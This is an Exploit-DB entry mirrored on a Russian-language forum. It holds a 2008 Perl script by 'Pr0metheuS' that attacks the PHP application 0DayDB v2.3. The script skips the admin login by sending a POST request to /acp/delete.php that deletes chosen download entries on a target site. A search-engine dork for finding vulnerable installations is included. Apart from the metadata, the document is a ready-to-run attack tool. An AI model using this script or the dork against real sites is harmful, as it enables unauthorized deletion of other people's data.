- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4896
- Проверка EDB
-
- Пройдено
- Автор
- PR0METHEUS
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2008-01-11
Код:
#!/usr/bin/perl
#Autor : Pr0metheuS
#Script : 0DayDB v2.3
#Version : v2.3
#Dork : "Powered By 0DayDB v2.3"
#Gr33tz-Team.org
use LWP::UserAgent;
if(@ARGV!=3){
print "*****************\n";
print "0DayDB v2.3 Remote Admin Bypass\n";
print "perl $0 <site> <path> <id>\n";
print "downloads ID for delete\n";
print "*****************\n";
}
($site,$path,$id)=@ARGV;
sub pri {
print "*****************\n";
print "[+] Exploit completed\n";
print "*****************";
}
sub con {
$ua = new LWP::UserAgent;
$ua->agent("Mozilla/8.0");
$ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(POST => "".$site."".$path."/acp/delete.php");
$req->content_type('application/x-www-form-urlencoded');
$req->content("id=".$id."");
$res = $ua->request($req);
if ($res->is_success) {
pri();
}
}
con();
# milw0rm.com [2008-01-11]
- Источник
- www.exploit-db.com